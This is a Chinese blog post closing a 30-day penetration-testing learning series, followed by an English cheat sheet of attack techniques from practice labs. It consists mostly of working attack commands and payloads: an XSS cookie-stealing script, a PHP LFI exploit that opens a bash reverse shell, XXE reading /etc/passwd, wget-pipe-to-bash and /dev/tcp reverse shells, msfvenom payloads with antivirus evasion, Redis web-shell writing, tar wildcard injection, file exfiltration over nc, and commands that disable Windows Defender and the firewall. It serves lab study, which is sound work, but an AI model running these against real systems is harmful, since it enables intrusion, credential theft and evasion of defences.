iT邦幫忙

2021 iThome 鐵人賽

DAY 30
0
Security

我想學滲透測試喵喵喵喵!!!!系列 第 30

[Day30] Pentesting CheatSheet Meow Meow

終於到了最後一天了,感覺這陣子打了好多好多的靶機哦,希望過去的這些文章可以對大家有一些幫助。非常感謝隊友的提醒與鼓勵,我才有辦法撐過雙主題的 30 天 QQ,也非常感謝飛飛贊助給我 TryHackMe 的帳號。

另外,我也有將過去打過的各種題型與內容整理成了 Cheat Sheet 可以供大家參考,不過為了可以快速的 Ctrl + F 搜尋到關鍵字,所以我的內容是寫英文ㄉ,我也會將過去以及未來練習的所有資源放置於我的 Github 上,供大家參考!再次感謝看到最後一篇的大家!


Pentesting CheatSheet Meow Meow

Scan

Portscan

  • nmap
    • Parameters
      • -A : Enable OS detection, version detection, script scanning, and traceroute
      • -p- : Scan all ports
      • -p 1000-9999 : Scan port from 1000 to 9999
  • RustScan
    • rustscan -a 10.10.166.15
      • -r 1-65535 : Port range from 1 to 65535

Services

  • enum4linux
    • Parameters
      • -a : Do all simple enumeration

Web

Scan

Front-End

XSS

  • Steal Cookie
    • <script>new Image().src="http://{my_ip}:1234/"+document.cookie</script>
    • nc -l 1234

CSRF

<form id="myForm" name="myForm" action="/change_pass.php" method="POST">
<input type=hidden name="password" id="password" value="meowmeow"/>
<input type=hidden name="confirm_password" id="confirm_password" value="meowmeow"/>
<input type=hidden name="submit" id="submit" value="submit"/>
<script>document.createElement('form').submit.call(document.getElementById('myForm'))</script>

Server

Apache

  • Default log path
    • /var/log/apache2/access.log
  • Shell Shock
    • Exist some path like /cgi-bin/*.sh
    • Add () { :;}; echo; /usr/bin/id to User-Agent
      • Must use Absolute path

Nginx

IIS

  • Default web root path
    • C:\inetpub\wwwroot
  • IIS 6.0

Tomcat

  • Tomcat Path
    • /manager/status/all
    • /admin/dashboard
  • Path Bypass
    • With /..;/
      • e.g. /manager/status/..;/html/upload

PHP

  • Bypass system
    • echo passthru("whoami")
    • echo shell_exec("whoami")
    • echo exec("whoami")
  • Wrapper
    • php://filter/convert.base64-encode/resource=meow.php
  • Default Session Path
    • /var/lib/php/sessions/sess_{sess_name}
  • LFI PHP_SESSION_UPLOAD_PROGRESS (From Splitline)
    import grequests
    sess_name = 'meowmeow'
    sess_path = f'/var/lib/php/sessions/sess_{sess_name}'
    base_url = 'http://{target-domain}/{target-path/randylogs.php}'
    param = "file"
    
    # code = "file_put_contents('/tmp/shell.php','<?php system($_GET[a])');"
    code = '''system("bash -c 'bash -i >& /dev/tcp/{domain}/{port} 0>&1'");'''
    
    while True:
        req = [grequests.post(base_url,
                              files={'f': "A"*0xffff},
                              data={'PHP_SESSION_UPLOAD_PROGRESS': f"pwned:<?php {code} ?>"},
                              cookies={'PHPSESSID': sess_name}),
               grequests.get(f"{base_url}?{param}={sess_path}")]
    
        result = grequests.map(req)
        if "pwned" in result[1].text:
            print(result[1].text)
            break
    
  • XXE
    var xml = '' +
        '<?xml version="1.0" encoding="UTF-8"?>\n' +
        '<!DOCTYPE a [ <!ENTITY b SYSTEM "file:///etc/passwd"> ]>\n' +
        '<root>' +
        '<name>' + "0" + '</name>' +
        '<search>' + "&b;" + '</search>' +
        '</root>';
    

JSP / Tomcat

Defence

  • Knockd
    • /etc/knockd.conf
    • nc port several time to knock

Web Shell

CMS

Wordpress

  • WPScan

      • wpscan --url {URL} –-enumerate p,t,u --plugins-detection aggressive -t 30
    • enumerate
      • p : plugin
      • t : theme
      • u : users
    • t : thread
  • Enum user

    • http://{ip}/index.php/?author=1

MySQL injection

SQL Command

  • Limit
    • LIMIT 0,1 , LIMIT 1,1 , LIMIT 2,1 ...
      • Select only 1 data
  • Substring
    • SUBSTRING("ABC",1,1)
      • Will return A
    • SUBSTRING("ABC",2,1)
      • Will return B
  • ASCII
    • ASCII("A")
      • Will Return 65
  • Concat
    • concat(1,':',2)
      • Will return 1:2
  • group_concat
    • Concatenate multiple data to online string

Dump Data

  • DB name
    • select schema_name from information_schema.schemata
  • Table name
    • select table_name from information_schema.tables where table_schema='{db_name}'
  • Column name
    • select column_name from information_schema.columns where table_name='{table_name}' and table_schema='{db_name}'
  • Select data
    • select concat({username},':',{password}) from {db_name}.{password}
  • Mysql User and hash
    • select concat(user,':',password) from mysql.user
  • Command dump
    • mysqldump -u {username} -h localhost -p {dbname} > a.sql

Shell

Linux Shell

  • Find File
    • find / -iname {file_name} -print 2>/dev/null
    • du -a 2>/dev/null | grep {file_name}
    • tar cf - $PWD 2>/dev/null | tar tvf - | grep {file_name}

Windows Shell

  • List all data
    • dir /a
  • Find File
    • dir {file_name} /s /p

Reverse Shell - Linux

  • Prepare
    • nc -nvlp {port}
    • nc -vlk {port}
    • rlwrap nc -nvlp
      • Support left and right
  • https://reverse-shell.sh/
  • Reverse Shell Cheatsheet
  • Bash tcp
    • bash -c 'bash -i >& /dev/tcp/my_ip/7877 0>&1'
      • Write file in local first, and use wget/curl to get to victim machine
      • /usr/bin/wget -O - {ip:port}/{file} | /bin/bash
  • Make it more interactively
    • python -c 'import pty; pty.spawn("/bin/bash")'
    • perl -e 'exec "/bin/bash";'

Reverse Shell - Windows

  • msfvenom

    • https://infinitelogins.com/2020/01/25/sfvenom-reverse-shell-payload-cheatsheet/
      • stage : shell/reverse_tcp
        • msf multi/handler to receive
      • stageless : shell_reverse_tcp
        • nc to receive
    • aspx
      • msfvenom -p windows/shell_reverse_tcp LHOST={IP} LPORT={PORT} -f aspx > shell.aspx
      • msfvenom -p windows/shell/reverse_tcp LHOST={IP} LPORT={PORT} -f aspx > shell.aspx
    • exe
      • msfvenom -p windows/shell_reverse_tcp LHOST={IP} LPORT={PORT} -f exe > shell-x86.exe
      • msfvenom -p windows/shell_reverse_tcp LHOST={IP} LPORT={PORT} -e x86/shikata_ga_nai -f exe > shell.exe
        • Anti-Anti-virus
      • msfvenom -p windows/x64/shell_reverse_tcp LHOST={IP} LPORT={PORT} -f exe -o shellx64.exe
        • Most of time, x64 system can also run x86 shell
    • msi
      • msfvenom -p windows/x64/shell_reverse_tcp LHOST={IP} LPORT={Port} -f msi -o shellx64.msi
        • Install by msiexec /quiet /i shellx64.msi
  • Powershell

File Transmission - Linux

  • SCP
  • HTTP
    • Prepare
      • python3 -m http.server
        • use sudo to get 80 port
    • GET
      • wget {my_ip}:{port}/{file_name} -O {path_to_output}
      • curl -o {path_to_output} http
  • NC
    • Prepare
      • nc -l -p {attacker_port} > {file}
    • Send
      • nc {attacker_ip} {attacker_port} < {file}
      • cat {file} > /dev/tcp/{ip}/{port}

File Transmission - Windows

  • HTTP
    • Prepare
      • python3 -m http.server
    • GET (Powershell)
      • wget , curl , iwr is alias for Invoke-WebRequest
        • Invoke-WebRequest http://{my_ip}:{my_port}/{file} -outFile {file_name}
          • -UseBasicParsing
      • certutil -urlcache -f {URL} {File_name}
  • SMB
    • impacket-smbserver meow .
      • In Kali
      • -smb2support
    • copy \\{IP}\meow\{filename} {filename}
      • In Windows
  • Pack file
    • cab
      • lcab -r {dir} {file.cab}
        • In kali
      • expand {file.cab} -F:* {Extract path}
        • Extract path must be absolute path like C:\Windows\Temp
  • https://blog.ropnop.com/transferring-files-from-kali-to-windows/

Server

Redis

  • Write shell / file
    • redis-cli -h {ip}
      • Connect
    • config set dir "/var/www/html"
      • Set dir
    • config set dbfilename meow.php
      • Set file name
    • set x "\r\n\r\n<?php system($_GET[A]);?>\r\n\r\n"
      • Write web shell
    • save
      • Save file

MSSQL

  • Connect
    • impacket-mssqlclient -p {port} {UserID}@{IP} -windows-auth
    • Default port : 1433
  • Shell
    • exec xp_cmdshell '{Command}

Oracle

  • Default Port 1521
  • Check version
    • nmap --script "oracle-tns-version" -p 1521 -T4 -sV {IP}
  • Brute Force SID
  • Connection
    • tnscmd10g status --10G -p {port} -h {IP}
  • ODAT
  • Brute Force Username and Password
    • ./odat all -s {IP} -p {PORT} -d {SID}
    • --accounts-file , --accounts-files
  • RCE
    • odat-libc2.12-x86_64 ./odat-libc2.12-x86_64 dbmsscheduler -U {Username} -P {Password} -d {SID} -s {IP} --sysdba --exec "{command}"

SMB

  • smb to shell
    • winexe -U '{username}' //{ip} cmd.exe
    • impacket-smbexec '{username}:{password}'@{ip}
    • impacket-psexec {username}:{password}'@{ip}

PostgreSQL

  • Dump
    • PGPASSWORD="{PASSWORD}" pg_dump {DB_NAME} > test.dump

Privilege - Linux

Kernel Exploit

Software

  • GTFOBins
    • Linux privileges escalation
  • Pspy
    • Monitor the process

Enumeration

Scan the system to find which can be use for privileges escalation

Program Hijack

Python

  • import library priority
    1. local file
    2. python -c "import sys;print(sys.path)"
  • Check file permission if it can be write
  • Fake library file
      import pty
      pty.spawn("/bin/bash")
    

Bash

  • Relative path is from $PATH
    • We can modify this by
      • PATH=/my/fake/path:$PATH ./binary
    • Fake path can contain the shell/reverse shell command fle

Program

  • tar Wildcard
    • echo "bash -c 'bash -i >& /dev/tcp/my_ip/7877 0>&1'" > shell.sh
    • chmod 777 shell.sh
    • echo "" > "--checkpoint-action=exec=sh shell.sh"
    • echo "" > --checkpoint=1
    • tar cf archive.tar *

Capability

Doas

  • doas.conf
    • if exist permit nopass {user} as {root} cmd {binary}
    • We can doas {binary} and it will run as root

Docker

  • /.dockerenv
    • If exist, probably in docker
  • Notice mount point

SOP

  • Check sudo -l
    • What file we can run as super user
  • Check crontab
    • cat /etc/crontab
    • With LinEnum, LinPeas
    • PsPy check
  • Check SUID / SGID
    • find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
    • find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
    • With GTFOBins
  • Check sudo version
  • Check $PATH / import library permission
    • Program Hijack
  • Check capability
    • getcap -r / 2>/dev/null
    • Check if the program has some useful capability
  • Check backup file

Privilege - Windows

Exploit

Bypass UAC

Registry

  • AlwaysInstallElevated
    • If both set to 1
      • reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
      • reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    • Can install file with
      • msfvenom -p windows/x64/shell_reverse_tcp LHOST={IP} LPORT={Port} -f msi -o shellx64.msi
      • msiexec /quiet /i shellx64.msi
    • But need to check where can install (AppLocker)
      • Get-AppLockerOolicy -Effective | Select -Expandproperty RuleCollections

Defender / Firewall

  • 64 bit Powershell
    • %SystemRoot%\sysnative\WindowsPowerShell\v1.0\powershell.exe
  • Disable Realtime Monitoring
    • Set-MpPreference -DisableRealtimeMonitoring $true
  • Uninstall Defender
    • Uninstall-WindowsFeature -Name Windows-Defender –whatif
    • Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
  • Turn off firewall
    • Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
  • Check Defender Status
    • powershell -c Get-MpComputerStatus
      • Check AntivirusEnabled is True or False

Check vulnerability

Sensitive data

  • PowerShell History Path
    • %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
  • User Home
    • Desktop
    • Document
    • Download

Process

  • netstat -ano
    • Open Port
    • netstat -an | findstr "LISTENING"
  • tasklist
    • like ps

Permission

  • icacls
    • Check permission
    • /reset reset the permission to their parent
  • cpau
    • cpau -u {user_name} -p {password} -ex C:\{abs_exe_path} -LWP
    • Run command with given username and password.

Password Crack

Software

  • Hydra
    • Crack online services password
      • SMB,SSH,FTP......
    • Usage
      • ssh
        • hydra -l {username} -P {path_to_wordlist} ssh://{ip_address}
      • http{s}
        • hydra -l {username} -P {path_to_wordlist} {domain_name_without http/s} http{s}-post-form "{/{path}}:username=^USER^&password=^PASS^&data=data:{string_if_fail}"
  • John the ripper
    • Crack hash like /etc/shadow
    • Support tools
      • ssh2john
      • gpg2john
      • zip2john
      • samdump2
        • NTLM 2 John
        • samdump2 system sam > j.txt
    • Usage
      • john {file} --wordlist={wordlist}
  • Hashcat

Dictionary

Online

Software

  • RDP
    • xfreerdp +drives /u:{username} /v:{ip}:{port}
  • FTP
    • ls
    • get {file_name}
    • put {file_name}
    • Download recursive
      • wget -r 'ftp://{ip}/{path}/'
  • Unzip
    • .gz
      • gunzip {filename.gz}
  • tcpdump
    • Recv icmp : sudo tcpdump -i tun0 icmp

Reverse port forwarding

  • Chisel
    • Server : ./chisel server -p {listen_port} --reverse
      • listen port can be random
    • Client : ./chisel client {Remote_host}:{listen_port} R:{forward_port_at_attacker}:127.0.0.1:{forward_port}
    • eg. : Remote server run a program at 127.0.0.1:8888,we need to forward to our attack machine's 127.0.0.1:8888
      • ./chisel server -p 9999 --reverse
      • ./chisel client 10.10.16.35:9999 R:8888:127.0.0.1:8888
  • SSH
    • ssh -L {forward_port}:127.0.0.1:{forward_port} {remote_user}@{remote_ip} -p {ssh_port} -N -v -v
      • Run in local
      • eg : Remote 10.87.87.87 run 5555 in remote local, open 2222 port for ssh, we can use following command to forward 5555 to our local 5555
        • ssh -L 5555:127.0.0.1:5555 demo@10.87.87.87 -p 2222 -N -v -v

Forensics

  • Unknown files
    • file {file_name}
    • binwalk {file_name}
    • xxd {file_name}
    • foremost {file_name}
  • dd
    • dd if={input_file} bs=1 skip={skip_offset} of={outfile}

Steganography


上一篇
[Day29] HTB Netmon
系列文
我想學滲透測試喵喵喵喵!!!!30

尚未有邦友留言

立即登入留言